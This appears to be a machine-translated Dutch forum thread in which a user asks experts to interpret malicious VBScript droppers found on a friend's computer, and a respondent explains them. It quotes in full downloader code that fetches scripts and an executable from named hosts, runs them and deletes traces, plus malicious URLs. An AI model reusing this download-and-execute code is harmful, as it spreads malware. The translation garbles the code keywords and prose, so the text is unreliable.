Vraag : Kon een deskundige alstublieft om deze code VBS te interpreteren proberen

Hello experts
A heeft de vriend/>

A CMD.EXE venster verschijnt en duidelijk waits.
A Het vbs- dossier in Blocnote Notepad.
When gesloten is opent, het CMD vrij zekere venster closes.

I am dat dit een kwaadwillig manuscript die is het Vbs- dossier proberen in werking te stellen zonder het programma (CScript of WScript) te specificeren om het in werking te stellen, en omdat ik de standaardactie voor de meeste „manuscript“ type dossiertypes aan de „Edit“ actie (Blocnote) eerder dan „Open“ één (voer manuscript uit) heb geplaatst, is de kwaadwillige activiteit waarschijnlijk failing.

On de eerste gelegenheid geen die ik getuigde, het dossier „yb.vbs werd“ geopend in Blocnote van de %TEMP% omslag van de gebruiker met de volgende inhoud:

1:
B= " yb.vbs ": Met CreateObject („MSXML2.XMLHTTP“): .open „KRIJGEN“, „http://jyiop.com/kr/yb.vbs“, vals: .send (): Plaats A = CreateObject („Scripting.FileSystemObject“): Plaats D=A.CreateTextFile (A.GetSpecialFolder (2) +“ \ „+ B): D.WriteLine .responseText: Eind met: D.Close: CreateObject („WScript.Shell“). Looppas A.GetSpecialFolder (2) +“ \ „+ B


I downloadde veilig „ http://jyiop.com/kr/yb.vb s“ en zaag dat de inhoud „ruw verduisterd“ door het omkeren enkele parameters zoals hieronder getoond was:

1:
2:
3:
4:
5:
6:
7:
8:
w=3000: x=200: y=1: z=false: a = „http://jyiop.com/kr/hy/_q.php?&“: Vastgesteld e = Createobject (StrReverse („tcejbOmetsySeliF.gnitpircS“)): B = e.GetSpecialFolder (2) &“ \ exe.exe ": OT = „KRIJG“: Plaats c = CreateObject (StrReverse („PTTHLMX.2LMXSM“)): Plaats D = CreateObject (StrReverse („maertS.BDODA“))
Plaats o=Createobject (StrReverse („tcejbOmetsySeliF.gnitpircS“))
Op Fout hervat daarna
c.open OT, a, z: c.send ()
Als c.Status = x toen
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile B: d.Close
Eind als
CreateObject (StrReverse („llehS.tpircSW“)).eXeC B: CreateObject (StrReverse („llehS.tpircSW“)).eXeC „taskkill /F /IM wmplayer.exe“: Vastgestelde g=o.GetFile (e.GetSpecialFolder (2) &“ \ „& StrReverse („sbv.by“)): g.Delete: WScript.Sleep w: Vastgestelde g=o.GetFile (B): g.Delete


I downloadde veilig referenced „ http://jyiop.com/kr/hy/_q .php“ om deze code te openbaren:

1:



I weten dat het niet altijd mogelijk is om een *.php- dossier van een server te krijgen intact door normale middelen (d.w.z. Maak een verbinding aan het en klik > sparen Doel zoals > met de rechtermuisknop aan sparen als *.htm- dossier van zelfde naam) en met de juiste code, zodat enkel kan zijn de reactie van de server op mijn poging om file.

Assuming te downloaden vergelijkt relatieve URL aan:   http://jyiop.com/kr/_yoyk. php
then die aan http://www.google.com
I am testend dit op mijn eigen systeem met http://www.google.co.uk als homepage, zodat oplost weet ik dat het aan mijn homepage.

On de verdere niet alleen gelegenheid opnieuw richt die ik over VNC getuigde een bevel duidelijk werd uitgegeven om het dossier „uor.vbs“ van de %TEMP% omslag van de gebruiker in een bevelvenster in werking te stellen, en het notitieboekje omhoog het bevatten van het manuscript knalde:

1:
B= " uor.vbs ": Met CreateObject („MSXML2.XMLHTTP“): .open „KRIJGEN“, „http://ypuii.com/k_/uor.vbs“, vals: .send (): Plaats A = CreateObject („Scripting.FileSystemObject“): Plaats D=A.CreateTextFile (A.GetSpecialFolder (2) +“ \ „+ B): D.WriteLine .responseText: Eind met: D.Close: CreateObject („WScript.Shell“). Looppas A.GetSpecialFolder (2) +“ \ „+ B
en 


Safely „ http://ypuii.com/k_/uor.v bs“ in een tekstredacteur openbaarde het zelfde als voordien, d.w.z. downloaden openen. omgekeerde strings.

Now, heb ik geconstateerd dat „GetSpecialFolder (2)“ naar de %TEMP% omslag van de gebruiker verwijst, en ik kan zien dat het manuscript het Vbs- dossier downloadt, creërend een VBScript tijdens de vlucht door koorden en omgekeerde koorden aaneen te schakelen, maar ik ben precies onzeker van wat een manuscript als dit doet of aan do.

I am niet zeer vertrouwd met VBS buiten wat basisgebruik probeert, zodat zijn de volgende verwijzingen een raadsel aan me:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z: c.send ()
If c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile B: d.Close


I kan zo duidelijk zien zoals dag dat Windows Media Player weg wordt gedood als het loopt (geen wat het in de materiële tijden) was, maar ik ben benieuwd waarom een manuscript this.

One zou doen andere blijkbaar significante kwestie is dat ik een „onlangs getypte URL“ in de gebruiker D.W.Z. drop-down lijst van de Bar van het Adres ontdekte:
http://ypuii.com/k_/zcus/e fmjcg.pdf
I kon niet vinden dat dossier overal caching op de computer van de gebruiker en zij niet kan zelfs eraan herinneren wanneer zij het laatst een Pdf- dossier in haar browser zou geopend hebben.  Ik spaarde dat Het pdf- dossier en, op inspectie in een tekstredacteur, ik één of andere tekstinhoud als één of ander soort scripted code en een verwijzing naar „JavaScript“ kunnen zien.  Het volgende is ook duidelijk in een tekstredacteur:

/Author (MllZTgg yZ=ssA F V)
/gZ (. B LPD TV-Xqrf4dY3M s_JUNCVZa #8l=z 96yp2x: S5Rm k o 0&uFOcj% ihwBQn E K7gATGe H? I1W)
/Title (Ng JGgG qgMpr#AZMZH?)
/Keywords (Mokomeuapaualimajsi)
/Creator (Kotefekjoesito)
/ModDate (D: 20100621095906)
/Producer (820d5Deawohigejoxamogoga)

Googling enkel de naam „Kotefekjoesito“ van de „Schepper“ neemt me aan deze pagina:
http://jsunpack.jeek.org/d ec/go? report=c4cc162b45e937762035f286406a989f2adf2753
where het toont duidelijk aan dat het dossier Malicious.

I kan slechts veronderstellen is dat de vroegere verwijzing in VBScript naar „ADOBD.Stream“ een verwijzing naar „Adobe“, en naar een stroom in een maliciously bewerkt Pdf- dossier is.  Ik kan slechts veronderstellen dat dit of het begin van de kwestie was, of dat het een dossier door een kwaadwillig manuscript wordt gehaald was, maar ik niet zou gedacht hebben het URL aan de onlangs getypte Url- lijst die zou toegevoegd hebben.  Dat is in verwarring brengend in itself.

Probably niet een toeval is dat het googling StrReverse („maertS.BDODA " ) me ook aan „ http://jsunpack.jeek.org " plaats met deze pagina neemt:
http://jsunpack.jeek.org/d ec/go? report=5d7727607489f01840f34855c5664e662488962e
but het zegt niet die malicious.

Could is iemand me gelieve te adviseren wat dat eerste manuscript waarschijnlijk om zal gedaan te hebben of (te proberen om te doen) op de computer van de gebruiker.  Ik zou willen weten waar ik me bevind, omdat volledig systeemAntiVirus + een aftasten RootKit geen positieve resultaten hebben opgeleverd en ik kan geen verwijzingen naar de Vbs- dossiers in registry.

Thanks

Bill
vooraf zien

Antwoord : Kon een deskundige alstublieft om deze code VBS te interpreteren proberen

Ik ben niet bereid om zover als het openen van de websites te gaan u nochtans vermeldde, van de manuscripten hierboven hier is wat ik… zie

Manuscript 1 leidt tot een leeg dossier, verbindingen aan een website en downloads de inhoud van de pagina en stortplaatsen het in het lege dossier.  Dit dossier wordt opgeslagen als „yb.vbs“ en is verondersteld om uit te voeren.

B= " yb.vbs "
Met CreateObject („MSXML2.XMLHTTP“)
      .open „KRIJGEN“, „http://jyiop.com/kr/yb.vbs“, vals
      .send ()
      Plaats A = CreateObject („Scripting.FileSystemObject“)
      Plaats D = A.CreateTextFile (A.GetSpecialFolder (2) + „\“ + B)
      D.WriteLine .responseText
Eind met
D.Close
CreateObject („WScript.Shell“). Looppas A.GetSpecialFolder (2) +“ \ „+ B

Stap 2 nu het vbsdossier en looppas is gecre�ërd, het probeert om een andere webpage te bezoeken maar dit keer bewaart de Web-pagina inhoud in een dossier genoemd „exe.exe“.  Dit nieuwe dossier moet in de omslag van gebruikerstemperaturen worden opgeslagen.
Het manuscript stelt dan het dossier „exe.exe“ in werking.
Zoals u vermeldde, taskkill houdt de speler van de Media van Vensters tegen - waarom, die?!? het weet!
Het manuscript schrapt dan het vbmanuscript dat gecre�ërde 1 stapt (het manuscript dat momenteel loopt).
Er is een seconde 3 wacht dan het dossier „exe.exe“ wordt geschrapt.

Dit deel;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Als c.Status = x toen
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile B: d.Close]
is manuscript het typen om een dossier te openen dat in webpage - niets zal stromen met Adobe te doen.  „c.Status“ - het manuscript wacht op webpage klaar en geschikt te zijn te downloaden. „u=c.ResponseBody“ neemt de Web-pagina en stopt het in een variabele.  De stroom wordt geopend en de tekst wordt gedownload in de variabele.  Het dossier wordt opgeslagen en gesloten.  In dit manuscript worden webpage/het dossier opgeslagen in de temperaturenomslag als „exe.exe“.

Het echte gevaar is dat dossier „exe.exe“.  Zodra het in werking is gesteld, niemand kan zeggen wat het werd ontworpen om te doen.

Die computer is nog besmet met een virus.  Het programma „exe.exe“ kon andere virussen op de achtergrond gedownload hebben om aftasten van het systeem te belemmeren.  Het feit dat u het open bevelvenster kunt zien en het manuscript om wordt geprobeerd te lopen daar vertelt me is één of ander kwaadwillig dossier nog treuzelend.

Het kan tijd zijn om te evalueren wat van die machine moet worden bewaard en het begin opnieuw met van Vensters en toepassingen opnieuw installeert.  Het klinkt dramatisch maar ziend zoals antivirus niet ontdekt om het even wat uit soorten die ik bent u op het punt van geen terugkeer heb gedacht.  Herinner dat zolang de kwaadwillige code daar, om het even welke aandrijving is; zij het USB kunnen de geheugenstok, de camera enz., het virus potentieel bevatten/trojan, als het werd vastgemaakt aan de machine.
Andere oplossingen  
 
programming4us programming4us